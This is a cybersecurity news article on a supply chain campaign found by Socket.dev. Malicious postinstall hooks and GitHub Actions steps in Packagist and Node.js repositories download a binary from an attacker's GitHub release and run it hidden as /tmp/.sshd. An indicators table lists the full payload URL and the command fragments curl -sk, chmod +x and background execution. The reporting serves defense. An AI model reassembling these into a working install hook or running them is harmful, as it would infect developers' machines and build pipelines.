Hackers Hide Linux Payload During Package Install via
A novel supply chain attack campaign is actively targeting developers, leveraging a stealthy method many wouldn’t anticipate: malicious postinstall hooks. Security researchers at Hidden inside...
A novel supply chain attack campaign is actively targeting developers, leveraging a stealthy method many wouldn’t anticipate: malicious postinstall hooks. Security researchers at Hidden inside software packages on GitHub, a malicious script downloads a Linux binary during installation and disguises it using a filename designed to look like a standard system process. The attack has now touched more than 700 repositories across multiple ecosystems.
The campaign works by planting a harmful postinstall script inside PHP and Node.js packages. When a developer installs an affected package, the script runs automatically without any visible warning.
It reaches out to an attacker-controlled GitHub account, pulls down a binary file, and saves it to a temporary folder on the victim’s Linux system under the name /tmp/.sshd, a path that mimics a legitimate SSH daemon file used by the operating system.
Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified this campaign while investigating a set of flagged Packagist packages.
Their AI-powered scanner picked up on the suspicious install-time behavior, flagging packages as malicious based on how they handled binary downloads and background execution. The findings revealed a campaign far broader than the initial batch suggested.
The attack spreads across both Packagist and Node.js project repositories on GitHub. Investigators found that a GitHub account named parikhrpreksha served as the central delivery point for the payload.
The same postinstall command appeared consistently across hundreds of repositories, all pulling the same binary from the same GitHub Releases URL, pointing to a coordinated supply chain operation.
What makes this attack hard to catch is how effectively it hides its activity. The script suppresses error messages that might appear during installation and runs the downloaded binary silently in the background.
Developers reviewing standard install logs would see nothing unusual, and the file disguised under a name resembling an SSH process would blend into the system with little chance of standing out.
Payload Hidden Behind an SSH-Like Filename
The core of this attack hinges on a simple but effective disguise. The malicious script downloads a binary named fvbs.network from the attacker’s GitHub Releases page and writes it to /tmp/.sshd on the infected machine.
The dot prefix in the filename hides the file in most standard directory listings, while the .sshd naming makes it appear to be a trusted system service.
Once written, the binary is made executable using chmod +x and launched in the background, cutting off any visible connection to the install process. The script uses curl with TLS verification disabled, meaning it does not check whether the remote source is legitimate.
By the time the install command finishes, the payload is already running quietly on the developer’s machine. Socket’s investigation also confirmed that malicious commits were pushed directly into upstream GitHub repositories.
Branch-tracking versions such as dev-main, dev-master, and dev were used, meaning any Packagist package pointing to those branches would automatically pull in the infected code on the next update. Simply removing the affected package version was not enough, since the upstream repository itself needed to be fixed first.
Malicious Hooks Spread Across Packagist and Node.js
The confirmed Packagist packages all carried identical postinstall hooks pointing to the same attacker-controlled GitHub account.
In several Node.js repositories, the same payload delivery command was found inside GitHub Actions workflow files, positioning it to run during CI/CD pipeline execution rather than just local developer installs.
This dual-vector approach means the attack could reach both individual developers and automated build environments.
In at least one case, the payload command was embedded inside a workflow file using a dependency named dependency_cache_sync, broadening the exposure beyond what simple package scanning would catch.
Socket reported all affected packages to Packagist, which removed them promptly. However, the branch-tracking nature of many affected packages means developers should also verify that upstream repositories have been cleaned.
Teams using Packagist packages with PHP scripting or Laravel-based tooling should inspect composer.json files for unexpected postinstall entries.
Socket recommends checking for any binary written to /tmp with a dot-prefixed name, reviewing GitHub Actions workflow files for unfamiliar steps, and auditing packages that track development branches rather than fixed release tags.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| GitHub Account | parikhrpreksha |
Attacker-controlled GitHub account used as payload delivery infrastructure |
| URL | https://github.com/parikhrpreksha/system_network_helper_aacf/releases/latest/download/fvbs.network |
Direct download URL for the malicious Linux binary |
| File Name | fvbs.network |
Malicious Linux binary downloaded during package installation |
| File Path | /tmp/.sshd |
Location where the malicious binary is written on the victim machine, disguised as an SSH daemon file |
| Command Fragment | curl -sk |
Used to silently download the payload with TLS verification disabled |
| Command Fragment | chmod +x |
Used to make the downloaded binary executable before background execution |
| Command Fragment | /tmp/.sshd & |
Execution pattern used to launch the payload silently in the background |
| Dependency Name | dependency_cache_sync |
Malicious dependency name embedded in GitHub Actions workflow files |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
No Comment! Be the first one.